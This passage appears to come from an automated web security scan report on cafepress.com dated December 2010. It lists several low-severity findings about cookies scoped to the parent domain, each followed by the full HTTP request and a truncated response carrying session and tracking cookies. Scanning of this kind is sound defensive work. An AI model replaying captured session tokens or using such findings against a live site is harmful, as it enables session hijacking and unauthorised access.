GET /+buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59616 Date: Sun, 26 Dec 2010 13:48:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/ Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59616 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.13. http://www.cafepress.com/+calendars
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+calendars
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+calendars HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 57707 Date: Sun, 26 Dec 2010 13:48:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/ Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57707 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.14. http://www.cafepress.com/+clocks
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+clocks
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+clocks HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59318 Date: Sun, 26 Dec 2010 13:48:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/ Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59318 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.15. http://www.cafepress.com/+coasters
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+coasters
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+coasters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59255 Date: Sun, 26 Dec 2010 13:48:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/ Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59255 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+eat_sleep_game_light_tshirt,299007536
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 93204 Date: Sun, 26 Dec 2010 13:49:11 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93204 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.17. http://www.cafepress.com/+framed-prints
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+framed-prints
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+framed-prints HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 63735 Date: Sun, 26 Dec 2010 13:48:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/ Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 63735 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.18. http://www.cafepress.com/+greeting_cards
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+greeting_cards
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+greeting_cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; 